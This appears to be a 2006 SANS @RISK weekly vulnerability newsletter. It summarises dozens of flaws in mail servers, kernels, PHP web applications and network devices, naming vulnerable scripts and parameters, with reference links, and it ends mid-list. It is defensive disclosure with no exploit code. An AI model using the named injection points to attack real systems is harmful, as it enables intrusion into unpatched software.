@RISK: The Consensus Security Vulnerability Alert

Part I -- Critical Vulnerabilities from TippingPoint (www.tippingpoint.com)

Widely Deployed Software

• (1) CRITICAL: Apple Cumulative Security Update 2006-001
• (2) HIGH: Oracle E-Business Suite Diagnostics Pack Vulnerabilities

Exploit

• (3) Internet Explorer IsComponentInstalled Overflow

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)

Other Microsoft Products

• 06.9.1 - Microsoft Internet Explorer IsComponentInstalled Buffer Overflow

Third Party Windows Apps

• 06.9.2 - DirectContact Directory Traversal
• 06.9.3 - Alt-N MDaemon IMAP Server Remote Format String
• 06.9.4 - ArGoSoft Mail Server Pro IMAP Server Directory Traversal
• 06.9.5 - Multiple SpeedProject Applications Remote Directory Traversal
• 06.9.6 - ArGoSoft Mail Server Pro Multiple HTML Injection
• 06.9.7 - MTS Professional Open EMail Relay
• 06.9.8 - lighttpd Information Disclosure
• 06.9.9 - NetworkActiv Web Server Remote Script Disclosure
• 06.9.10 - LetterMerger Local Information Disclosure
• 06.9.11 - RaidenHTTPD Remote Script Disclosure
• 06.9.12 - Van Dyke SecureCRT and SecureFX Buffer Overflow

Mac Os

• 06.9.13 - Apple Mac OS X Directory Services Passwd Privilege Escalation

Linux

• 06.9.14 - Linux Kernel handle_stop_signal Denial of Service
• 06.9.15 - GNOME Evolution Denial of Service
• 06.9.16 - IRSSI DCC ACCEPT Denial of Service
• 06.9.17 - Linux Kernel XFS File System Local Information Disclosure
• 06.9.18 - Linux Kernel NFS Client Denial of Service
• 06.9.19 - Linux Kernel sys_mbind System Call Local Denial of Service
• 06.9.20 - Linux Kernel ELF File Entry Point Denial of Service

BSD

• 06.9.21 - FreeBSD Remote NFS Mount Request Denial of Service

Solaris

• 06.9.22 - Sun Solaris HSFS Filesystem Local Denial of Service

Unix

• 06.9.23 - Oreka RTP Packet Handling Remote Denial of Service

Cross Platform

• 06.9.24 - Oracle Diagnostics Multiple Vulnerabilities
• 06.9.25 - MySQL Query Logging Bypass
• 06.9.26 - phpRPC Library Remote Code Execution
• 06.9.27 - PHP Multiple Security Bypass Vulnerabilities
• 06.9.28 - Mozilla Thunderbird Multiple Remote Information Disclosure Vulnerabilities
• 06.9.29 - CrossFire Denial of Service
• 06.9.30 - SuSE YaST Online Update Script Signature Verification Bypass
• 06.9.31 - OpenSSH Remote PAM Denial of Service
• 06.9.32 - Flex Multiple Unspecified Vulnerabilities
• 06.9.33 - NCP Secure Client Multiple Vulnerabilities
• 06.9.34 - IBM WebSphere Application Server JSP Source Code Disclosure
• 06.9.35 - Apache mod_python FileSession Code Execution
• 06.9.36 - STLPort Library Multiple Buffer Overflow Vulnerabilities
• 06.9.37 - EMC Dantz Retrospect Backup Client Remote Denial of Service

Web Application - Cross Site Scripting

• 06.9.38 - Cactusoft Parodia Agencyprofile.ASP Cross-Site Scripting
• 06.9.39 - CGI Calendar Multiple Cross-Site Scripting Vulnerabilities
• 06.9.40 - Calcium EventText Cross-Site Scripting
• 06.9.41 - QwikiWiki Index.PHP Cross-Site Scripting
• 06.9.42 - MyPHPNuke Multiple Cross-Site Scripting Vulnerabilities
• 06.9.43 - TMSPublisher Search.CFM Cross-Site Scripting
• 06.9.44 - EZ Publish ImageCatalogue Cross-Site Scripting
• 06.9.45 - bttlxeForum Failure.ASP Cross-Site Scripting Vulnerability
• 06.9.46 - Thomson SpeedTouch 500 Series Cross-Site Scripting
• 06.9.47 - Fantastic Scripts Fantastic News SQL Injection
• 06.9.48 - Woltlab Burning Board Multiple Cross-Site Scripting Vulnerabilities
• 06.9.49 - iCal Calendar Text Cross-Site Scripting
• 06.9.50 - EJ3 TOPo Inc_header.PHP Cross-Site Scripting
• 06.9.51 - PEHEPE Membership Management System Cross-Site Scripting
• 06.9.52 - PunBB Header.PHP Cross-Site Scripting
• 06.9.53 - AddSoft StoreBot Manage.ASP Cross-Site Scripting

Web Application - SQL Injection

• 06.9.54 - Fantastic Scripts Fantastic ID Parameter SQL Injection
• 06.9.55 - D3Jeeb Multiple SQL Injection Vulnerabilities
• 06.9.56 - Cilem News Unspecified SQL Injection
• 06.9.57 - Pentacle In-Out Board Multiple SQL Injection Vulnerabilities
• 06.9.58 - phpWebSite Topics.PHP SQL Injection
• 06.9.59 - DCI-Taskeen Multiple SQL Injection Vulnerabilities
• 06.9.60 - PHP-Nuke Mainfile.PHP SQL Injection
• 06.9.61 - Lansuite Board Module SQL Injection
• 06.9.62 - AddSoft StoreBot MgrLogin.ASP SQL Injection
• 06.9.63 - Sendcard Multiple Unspecified SQL Injection Vulnerabilities
• 06.9.64 - DCI-Designs Dawaween Poems.PHP SQL Injection
• 06.9.65 - Woltlab Burning Board Multiple SQL Injection Vulnerabilities
• 06.9.66 - PluggedOut Nexus forgotten_password.PHP SQL Injection
• 06.9.67 - VUBB Index.PHP SQL Injection

Web Application

• 06.9.68 - EKINboard Multiple Input Validation Vulnerabilities
• 06.9.69 - n8cms Multiple Input Validation Vulnerabilities
• 06.9.70 - ShoutLIVE Multiple Input Validation Vulnerabilities
• 06.9.71 - 4images Index.PHP Remote File Include
• 06.9.72 - Archangel Weblog Authentication Bypass
• 06.9.73 - freeForum Remote PHP Script Code Injection
• 06.9.74 - HP System Management Homepage Unspecified Directory Traversal
• 06.9.75 - DEV Web Management System HTML Injection
• 06.9.76 - SPiD Scan_Lang_Insert.PHP Local File Include
• 06.9.77 - FreeHostShop Website Generator Arbitrary File Upload
• 06.9.78 - iGenus WebMail Config_Inc.PHP Remote File Include
• 06.9.79 - Simple Machines X-Forwarded-For HTML Injection
• 06.9.80 - freeForum Multiple HTML Injection Vulnerabilities
• 06.9.81 - WordPress Multiple HTML Injection Vulnerabilities
• 06.9.82 - PEHEPE Membership Management System PHP Script Code Injection
• 06.9.83 - Limbo CMS Frontpage Arbitrary PHP Command Execution
• 06.9.84 - Issue Dealer Information Disclosure
• 06.9.85 - SMBlog Arbitrary PHP Command Execution
• 06.9.86 - UKiWEB UKiBoard FCE.PHP BBCode HTML Injection
• 06.9.87 - LogIT Remote File Include
• 06.9.88 - NZ Ecommerce Multiple Input Validation Vulnerabilities

Network Device

• 06.9.89 - NuFW Remote TLS Connection Handling Denial of Service
• 06.9.90 - Netgear WGT624 Wireless Access Point Default Backdoor Account
• 06.9.91 - Netgear WGT624 Wireless Firewall Router Information Disclosure
• 06.9.92 - Compex NetPassage WPE54G Denial Of Service

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rohit Dhamankar and Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 9, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 4922 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

• 06.9.1 - CVE: Not Available
• Platform: Other Microsoft Products
• Title: Microsoft Internet Explorer IsComponentInstalled Buffer Overflow
• Description: Microsoft Internet Explorer supports the "IsComponentInstalled()" method to report if a particular component is installed. It is prone to a buffer overflow condition due to insufficient bounds checking on the "sID" argument. This issue was reportedly addressed in Windows 2000 SP4 and Windows XP SP1, however this has not been confirmed. Internet Explorer 6 is vulnerable to this issue; earlier versions may also be affected.
• Ref: http://www.securityfocus.com/bid/16870

• 06.9.2 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: DirectContact Directory Traversal
• Description: DirectContact is a web server for Windows platforms. DirectContact is prone to a directory traversal vulnerability. The problem occurs with specially crafted HTTP GET requests containing directory traversal strings. DirectContact 0.3b is reportedly vulnerable.
• Ref: http://www.securityfocus.com/bid/16849

• 06.9.3 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Alt-N MDaemon IMAP Server Remote Format String
• Description: Alt-N MDaemon is a Microsoft Windows-based mail server product. It is affected by a remote format string vulnerability due to improper sanitization of user-supplied input prior to its use in the format-specifier argument to a formatted printing function. This issue presents itself when an attacker submits format specification sequences through the folder name argument of the IMAP "CREATE" and "LIST" commands. Alt-N MDaemon 8.1.1 is reported to be vulnerable; other versions are likely affected as well.
• Ref: http://www.securityfocus.com/bid/16854/exploit

• 06.9.4 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: ArGoSoft Mail Server Pro IMAP Server Directory Traversal
• Description: ArGoSoft Mail Server Pro is a mail server application. It is vulnerable to a directory traversal issue due to insufficient sanitization of user input to the IMAP "RENAME" command. ArGoSoft Mail Server Pro version 1.8.8.1 is vulnerable.
• Ref: http://www.securityfocus.com/archive/1/425969

• 06.9.5 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Multiple SpeedProject Applications Remote Directory Traversal
• Description: This issue affects SpeedCommander, ZipStar and Squeez. These applications are archiving and compression applications for Microsoft Windows. The applications are reported prone to a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. Speedproject ZipStar 5.1, Speedproject Squeez 5.1 and Speedproject SpeedCommander 11.0 Build 4450 are affected.
• Ref: http://www.securityfocus.com/bid/16807/exploit

• 06.9.6 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: ArGoSoft Mail Server Pro Multiple HTML Injection
• Description: ArGoSoft Mail Server is an SMTP, POP3 and Finger server. Insufficient sanitization of email headers such as "subject" and "from" exposes the application to an HTML injection issue. ArGoSoft Mail Server Pro 1.8.8.5 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/16834

• 06.9.7 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: MTS Professional Open EMail Relay
• Description: MTS Professional is a SMTP/POP3 email server for the Microsoft Windows platform. It is susceptible to a remote open-email-relay vulnerability. This issue is due to a failure in the application to properly verify the source of mail before forwarding it.
• Ref: http://www.securityfocus.com/bid/16840

• 06.9.8 - CVE: CVE-2006-0814
• Platform: Third Party Windows Apps
• Title: lighttpd Information Disclosure
• Description: lighttpd is a web server. It is affected by an information disclosure issue due to insufficient sanitization of the GET request. lighttpd versions prior to 1.4.10a for Windows are affected.
• Ref: http://www.securityfocus.com/bid/16893

• 06.9.9 - CVE: CVE-2006-0815
• Platform: Third Party Windows Apps
• Title: NetworkActiv Web Server Remote Script Disclosure
• Description: NetworkActiv Web Server is vulnerable to an information disclosure issue because the application fails to properly validate file extensions in an HTTP GET request. NetworkActiv Web Server versions 3.5.15 and earlier are vulnerable.
• Ref: http://secunia.com/secunia_research/2006-10/advisory/

• 06.9.10 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: LetterMerger Local Information Disclosure
• Description: LetterMerger is an alternative to the Microsoft Word mail merge tool. It is prone to a local information disclosure vulnerability. The issue exists because the application stores data with insecure permissions in a Microsoft Access database. LetterMerger version 1.2 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16917

• 06.9.11 - CVE: CVE-2006-0949
• Platform: Third Party Windows Apps
• Title: RaidenHTTPD Remote Script Disclosure
• Description: RaidenHTTPD is a web server. It is vulnerable to an information disclosure issue when the application fails to properly validate file extensions in an HTTP GET request. RaidenHTTPD versions 1.1.47 and earlier are vulnerable.
• Ref: http://secunia.com/secunia_research/2006-15/advisory/

• 06.9.12 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Van Dyke SecureCRT and SecureFX Buffer Overflow
• Description: Van Dyke Software SecureCRT is a Secure Shell (SSH) client and SecureFX is a secure file transfer client. They are vulnerable to a buffer overflow issue when unicode strings are converted to narrow strings. Van Dyke Software SecureCRT versions 5.0.4 and earlier are vunerable. SecureFX versions 3.0.4 and earlier are vulnerable.
• Ref: http://www.vandyke.com/products/securefx/history.txt http://www.vandyke.com/products/securecrt/history.txt

• 06.9.13 - CVE: CVE-2005-2713, CVE-2005-2714
• Platform: Mac Os
• Title: Apple Mac OS X Directory Services Passwd Privilege Escalation
• Description: Apple Mac OS X Directory Services implements the "passwd" utility to allow users to change their passwords. It is affected by two issues which result in privilege escalation issues. These issues were originally described in Apple Mac OS X Security Update 2006-001.
• Ref: http://www.securityfocus.com/bid/16910

• 06.9.14 - CVE: CVE-2005-3847
• Platform: Linux
• Title: Linux Kernel handle_stop_signal Denial of Service
• Description: Linux kernel is prone to a denial of service vulnerability caused by a race condition. The issue resides in the "handle_stop_signal()" function in "signal.c". It arises when a core dump is triggered in one thread while another thread has a pending SIGKILL. Ref: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=dd12f48d4e8774415b528d3991ae47c28f26e1ac;hp=ade6648b3b11a5d81f6f28135193ab6d85d621db

• 06.9.15 - CVE: CVE-2006-0040
• Platform: Linux
• Title: GNOME Evolution Denial of Service
• Description: Evolution is an email client for the GNOME desktop. It is vulnerable to a remote denial of service issue due to a failure in the application to properly handle incoming emails consisting of a large number of URI and other formatting. This issue is compounded when the application is restarted, as it will attempt to process the same malicious email. GNOME Evolution versions 2.3.7 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/16899

• 06.9.16 - CVE: Not Available
• Platform: Linux
• Title: IRSSI DCC ACCEPT Denial of Service
• Description: IRSSI is an Internet Relay Chat (IRC) client. It is vulnerable to a remote denial of service issue because the DCC ACCEPT command handler does not verify remotely specified arguments. IRSSI versions 0.8.9 and 0.8.10rc5 are vulnerable.
• Ref: http://www.securityfocus.com/bid/16913

• 06.9.17 - CVE: CVE-2006-0554
• Platform: Linux
• Title: Linux Kernel XFS File System Local Information Disclosure
• Description: The Linux kernel contains support for the XFS filesystem by SGI. It is susceptible to a local information disclosure issue due to a flaw in the filesystem that may result in previously written data being returned to local users. This issue arrises when certain "ftruncate()" activity triggers a flaw that may result in data extents being exposed to local users where holes should be. Linux kernel versions prior to 2.6.15.5 are affected.
• Ref: http://www.securityfocus.com/bid/16844

• 06.9.18 - CVE: CVE-2006-0555
• Platform: Linux
• Title: Linux Kernel NFS Client Denial of Service
• Description: Linux kernel NFS client is prone to a local denial of service vulnerability. This issue is due to improper handling of the direct I/O with excessive O_DIRECT data. For more information on affected versions, please follow the reference link.
• Ref: http://www.securityfocus.com/bid/16922

• 06.9.19 - CVE: Not Available
• Platform: Linux
• Title: Linux Kernel sys_mbind System Call Local Denial of Service
• Description: The Linux kernel "sys_mbind" system call is vulnerable to a local denial of service issue due to insufficient sanitization in the system call's arguments. Linux kernel versions 2.6.15.4 and earlier are vulnerable.
• Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.15.5

• 06.9.20 - CVE: CVE-2006-0741
• Platform: Linux
• Title: Linux Kernel ELF File Entry Point Denial of Service
• Description: Linux kernel is vulnerable to a denial of service when opening malformed ELF files with a bad entry address. Intel EM64T processors running Linux kernel versions 2.6.15.4 and earlier are vulnerable.
• Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.15.5

• 06.9.21 - CVE: Not Available
• Platform: BSD
• Title: FreeBSD Remote NFS Mount Request Denial of Service
• Description: FreeBSD is susceptible to a remote denial of service vulnerability. This issue is due to a flaw in affected kernels that potentially results in a crash when handling malformed NFS mount requests.
• Ref: http://www.securityfocus.com/bid/16838/exploit

• 06.9.22 - CVE: Not Available
• Platform: Solaris
• Title: Sun Solaris HSFS Filesystem Local Denial of Service
• Description: Sun Solaris is prone to a local denial of service issue that affects multiple locations of the "hsfs" module. A local unprivileged attacker can cause a system panic.
• Ref: http://www.securityfocus.com/bid/16816

• 06.9.23 - CVE: CVE-2006-0912
• Platform: Unix
• Title: Oreka RTP Packet Handling Remote Denial of Service
• Description: Oreka is a freely available, open-source audio recording application. Oreka is susceptible to a remote denial of service vulnerability. This issue is due to the application's failure to properly handle unspecified sequences of RTP packets. Oreka versions prior to 0.5 are affected by this issue.
• Ref: http://oreka.sourceforge.net/about/news?id=2006-02-16/0.5-release

• 06.9.24 - CVE: Not Available
• Platform: Cross Platform
• Title: Oracle Diagnostics Multiple Vulnerabilities
• Description: The Oracle Diagnostics module (IZU) is a troubleshooting feature of the Oracle E-Business Suite 11i. It is affected by multiple vulnerabilities including SQL injection. All current versions are affected.
• Ref: http://www.securityfocus.com/bid/16844

• 06.9.25 - CVE: Not Available
• Platform: Cross Platform
• Title: MySQL Query Logging Bypass
• Description: MySQL is susceptible to a query logging bypass vulnerability. This issue is due to a discrepancy between the handling of NULL bytes in input data in the "mysql_real_query()" function, and the query logging functionality. If an attacker issues queries against a vulnerable database with query logging enabled, they can include NULL bytes in order to truncate the query in the log. MySQL version 5.0.18 is affected.
• Ref: http://www.securityfocus.com/bid/16850

• 06.9.26 - CVE: Not Available
• Platform: Cross Platform
• Title: phpRPC Library Remote Code Execution
• Description: phpRPC is an xmlrpc library that uses database and rpc-protocol abstraction. It is prone to a remote code execution vulnerability because the "decode()" function within the "rpc_decoder.php" script fails to adequately sanitize user-supplied input before processing it in an "eval()" call. Successful exploitation would result in arbitrary code execution in the context of the application. PHP scripts that implement the phpRPC library, such as RunCMS, may also be affected by this issue.
• Ref: http://www.securityfocus.com/bid/16833

• 06.9.27 - CVE: Not Available
• Platform: Cross Platform
• Title: PHP Multiple Security Bypass Vulnerabilities
• Description: PHP is prone to multiple input validation vulnerabilities. These issues could allow an attacker to bypass the "safe_mode" and "open_basedir" security settings to obtain sensitive information. The first issue exists because the "mb_send_mail()" function does not properly validate user-supplied input to the "additional_parameter" parameter. The second issue occurs because various PHP IMAP functions do not properly validate user-supplied input. The IMAP vulnerabilities exist in PHP version 4.4.2 compiled with c_client 2004g; other versions may also be affected.
• Ref: http://www.securityfocus.com/bid/16878/exploit

• 06.9.28 - CVE: Not Available
• Platform: Cross Platform
• Title: Mozilla Thunderbird Multiple Remote Information Disclosure Vulnerabilities
• Description: Mozilla Thunderbird is susceptible to multiple remote information disclosure vulnerabilities. These issues are due to a failure of the application to properly enforce the restriction for downloading remote content in email messages. These issues allow remote attackers to gain access to potentially sensitive information, aiding them in further attacks. Mozilla Thunderbird version 1.5 is vulnerable to these issues.
• Ref: http://www.securityfocus.com/archive/1/426347

• 06.9.29 - CVE: CVE-2006-0677
• Platform: Cross Platform
• Title: CrossFire Denial of Service
• Description: CrossFire is a multiplayer role playing game for multiple operating systems. It is prone to a remote denial of service vulnerability due to a design error in the application. By turning on the "oldsocketmode" option in the application, and then sending an overly large request, an attacker can exploit this issue. Crossfire version 1.8 is reported to be vulnerable.
• Ref: http://aluigi.altervista.org/poc.htm

• 06.9.30 - CVE: CVE-2006-0803
• Platform: Cross Platform
• Title: SuSE YaST Online Update Script Signature Verification Bypass
• Description: SuSE YaST Online Update (YOU) is a software update utility that facilitates the installation of software updates from an online repository. The YaST Online Update is affected by a design error that could allow malicious scripts to bypass signature verification.
• Ref: http://www.securityfocus.com/bid/16889

• 06.9.31 - CVE: CVE-2006-0883
• Platform: Cross Platform
• Title: OpenSSH Remote PAM Denial of Service
• Description: OpenSSH is susceptible to a remote denial of service vulnerability. This issue arises when OpenSSH is configured with PrivilegeSeparation enabled, as well as configured to utilize OpenPAM as an authentication system. In this configuration, OpenSSH forks an unprivileged process to handle incoming connections, and another process to interact with the PAM authentication system. If the unprivileged process handling the incoming connection terminates while PAM authentication is underway, the OpenSSH master process mistakenly counts the orphaned children PAM processes in its connection accounting code. If an attacker causes many of these connections to be counted in this manner, the OpenSSH master process will believe that it is overloaded and it will stop accepting new connections. OpenSSH in conjunction with OpenPAM on FreeBSD versions 5.3 and 5.4 are affected by this issue. Other operating systems and versions may also be affected.
• Ref: http://www.securityfocus.com/bid/16892

• 06.9.32 - CVE: Not Available
• Platform: Cross Platform
• Title: Flex Multiple Unspecified Vulnerabilities
• Description: GNU Flex is a tool for generating lexical analyzers. It is vulnerable to multiple unspecified security issues. GNU Flex versions 2.5.32 and 2.5.30 are vulnerable.
• Ref: http://secunia.com/advisories/19071/

• 06.9.33 - CVE: Not Available
• Platform: Cross Platform
• Title: NCP Secure Client Multiple Vulnerabilities
• Description: NCP Secure Client is a commercial VPN and firewall application that is available for multiple platforms including Microsoft Windows and Linux. It is susceptible to multiple vulnerabilities. NCP Secure Client version 8.11 Build 146 on Microsoft Windows is vulnerable to these issues; other versions may also be affected.
• Ref: http://www.securityfocus.com/bid/16906

• 06.9.34 - CVE: Not Available
• Platform: Cross Platform
• Title: IBM WebSphere Application Server JSP Source Code Disclosure
• Description: IBM WebSphere Application Server is prone to a source code disclosure vulnerability. An attacker can exploit this issue by supplying malformed HTTP requests to the server to disclose JSP source code. This issue allows remote attackers to gain access to the contents of potentially sensitive JSP source pages, aiding them in further attacks. Versions 5.0.2 and 5.1.1 of the software are vulnerable.
• Ref: http://www-1.ibm.com/support/docview.wss?uid=swg21231377

• 06.9.35 - CVE: Not Available
• Platform: Cross Platform
• Title: Apache mod_python FileSession Code Execution
• Description: Apache's mod_python is a module which allows the web server to interpret Python scripts. Apache mod_python is prone to a code execution vulnerability. Reports indicate that this issue affects the FileSession object of mod_python. It should be noted that this issue only affects mod_python version 3.2.7 and only arises if FileSession has been enabled, which is not enabled by default.
• Ref: http://www.cgisecurity.com/2006/02/07

• 06.9.36 - CVE: Not Available
• Platform: Cross Platform
• Title: STLPort Library Multiple Buffer Overflow Vulnerabilities
• Description: STLport is a freely available, open source C++ Standard Template Library (STL). The STLport library is susceptible to multiple buffer overflow vulnerabilities. These issues are due improper boundary checking of the user-supplied input prior to copying it to insufficiently sized memory buffers. The first issues are due to several incorrectly-bounded uses of the "strcpy()" function in the "src/c_locale_glibc/c_locale_glibc2.c" source file. STLport versions prior to 5.0.2 are affected by these issues.
• Ref: http://www.securityfocus.com/bid/16928

• 06.9.37 - CVE: Not Available
• Platform: Cross Platform
• Title: EMC Dantz Retrospect Backup Client Remote Denial of Service
• Description: Dantz Retrospect Backup client is a network backup client for Windows and Apple OS X platforms. It is affected by a remote denial of service if it receives malformed data on TCP port 497. This issue has been addressed in Retrospect Backup Client 6.5.138 and 7.0.109.
• Ref: http://www.securityfocus.com/bid/16933

• 06.9.38 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Cactusoft Parodia Agencyprofile.ASP Cross-Site Scripting
• Description: Parodia is a web-based job board application. It is prone to a cross-site scripting vulnerability due to improper sanitization of user-supplied input to the "AG_ID" parameter of the "agencyprofile.asp" script. CactuSoft Parodia version 6.2 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16865

• 06.9.39 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: CGI Calendar Multiple Cross-Site Scripting Vulnerabilities
• Description: CGI Calendar is a freely available online calendar application. It is prone to multiple cross-site scripting vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. CGI Calendar version 2.7 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16859

• 06.9.40 - CVE: CVE-2006-0889
• Platform: Web Application - Cross Site Scripting
• Title: Calcium EventText Cross-Site Scripting
• Description: Calcium is a web-based calendar application for any platform that supports Perl CGI scripts. Calcium is prone to a cross-site scripting vulnerability. Calcium version 3.10.1 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16851

• 06.9.41 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: QwikiWiki Index.PHP Cross-Site Scripting
• Description: QwikiWiki is a web-based wiki application implemented in PHP. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "page" parameter of the "index.php" script. QwikiWiki version 1.4 is affected.
• Ref: http://www.securityfocus.com/bid/16874

• 06.9.42 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: MyPHPNuke Multiple Cross-Site Scripting Vulnerabilities
• Description: MyPHPNuke is a web-based content management system written in PHP. It is prone to multiple cross-site scripting vulnerabilities due to insufficient sanitization of user-supplied input to the "letter" parameter of the "reviews.php" script, and the "category" parameter of the "download.php" script. myPHPNuke version 1.8.8 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16815

• 06.9.43 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: TMSPublisher Search.CFM Cross-Site Scripting
• Description: tmsPublisher is a web-based content management system implemented in ColdFusion. Insufficient sanitization of the "search.cfm" script exposes the application to a cross-site scripting issue.
• Ref: http://www.securityfocus.com/bid/16816

• 06.9.44 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: EZ Publish ImageCatalogue Cross-Site Scripting
• Description: eZ Publish is a web-based content management system. Insufficient sanitization of the "RefererURL" parameter in the "imagecatalogue" module exposes the application to a cross-site scripting issue.
• Ref: http://www.securityfocus.com/bid/16817

• 06.9.45 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: bttlxeForum Failure.ASP Cross-Site Scripting Vulnerability
• Description: bttlxeForum is web forum application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "err_txt" parameter of the "failure.asp" script. Battleaxe Software bttlxeForum version 2.0 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16821

• 06.9.46 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Thomson SpeedTouch 500 Series Cross-Site Scripting
• Description: The SpeedTouch 500 series are ADSL modems that have a built-in web interface for configuration. The SpeedTouch 500 series are prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site.
• Ref: http://www.securityfocus.com/archive/1/426186

• 06.9.47 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Fantastic Scripts Fantastic News SQL Injection
• Description: Fantastic News is a web-based bulletin board written in PHP. It is prone to an SQL injection vulnerability. Fantastic News version 2.1.1 is affected.
• Ref: http://www.securityfocus.com/archive/1/426195

• 06.9.48 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Woltlab Burning Board Multiple Cross-Site Scripting Vulnerabilities
• Description: Woltlab Burning Board is a web-based bulletin board package. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to the "username" parameter of the "galerie_index.php" script and the "inpic" parameter of the "galerie_onfly.php" script. Woltlab Burning Board versions 2.7 and earlier are vulnerable.
• Ref: http://www.securityfocus.com/bid/16843

• 06.9.49 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: iCal Calendar Text Cross-Site Scripting
• Description: Brown Bear Software iCal is a web-based calendar application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "Calendar Text" parameter. Brown Bear Software iCal version 3.10 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16845/info

• 06.9.50 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: EJ3 TOPo Inc_header.PHP Cross-Site Scripting
• Description: EJ3 TOPo is a topsite ranking application implemented in PHP. EJ3 TOPo is prone to a cross-site scripting vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input to the "gTopNomBer" parameter of the "inc_header.php" script. EJ3 TOPo version 2.2.178 is vulnerable.
• Ref: http://www.securityfocus.com/archive/1/426318

• 06.9.51 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: PEHEPE Membership Management System Cross-Site Scripting
• Description: PEHEPE Membership Management System is a member directory application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "kul_adi" parameter of the "sol_menu.php" script. PEHEPE Membership Management System version 3 is vulnerable.
• Ref: http://yns.zaxaz.com/2006/02/

• 06.9.52 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: PunBB Header.PHP Cross-Site Scripting
• Description: PunBB is a bulletin board application written in PHP. It is prone to a cross-site scripting vulnerability. PunBB version 1.2.10 is vulnerable.
• Ref: http://www.punbb.org/changelogs/1.2.10_to_1.2.11.txt

• 06.9.53 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: AddSoft StoreBot Manage.ASP Cross-Site Scripting
• Description: StoreBot is web-based shopping cart software implemented in ASP. StoreBot is prone to a cross-site scripting vulnerability. AddSoft StoreBot 2002 Standard Edition is vulnerable.
• Ref: http://www.securityfocus.com/bid/16898

• 06.9.54 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Fantastic Scripts Fantastic ID Parameter SQL Injection
• Description: Fantastic News is a web-based bulletin board. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "id" parameter of the "news.php" script. Fantastic News version 2.1.1 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16860

• 06.9.55 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: D3Jeeb Multiple SQL Injection Vulnerabilities
• Description: D3Jeeb is a web application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "catid" parameter of "fastlinks.php" and "catogary.php" scripts. D3Jeeb Pro version 3 is vulnerable.
• Ref: http://secunia.com/advisories/19062/

• 06.9.56 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Cilem News Unspecified SQL Injection
• Description: Cilem News is a news-related web application with a database back end. Cilem News is prone to an unspecified SQL injection vulnerability. Cilem News versions 1.1 and 1.0 are vulnerable.
• Ref: http://www.securityfocus.com/bid/16813

• 06.9.57 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Pentacle In-Out Board Multiple SQL Injection Vulnerabilities
• Description: Pentacle In-Out Board is a web-based bulletin board application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "password" parameter of the "login.asp" script, and the "newsid" parameter of the "newsdetailsview.asp" script. Pentacle In-Out Board version 6.03 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16818

• 06.9.58 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: phpWebSite Topics.PHP SQL Injection
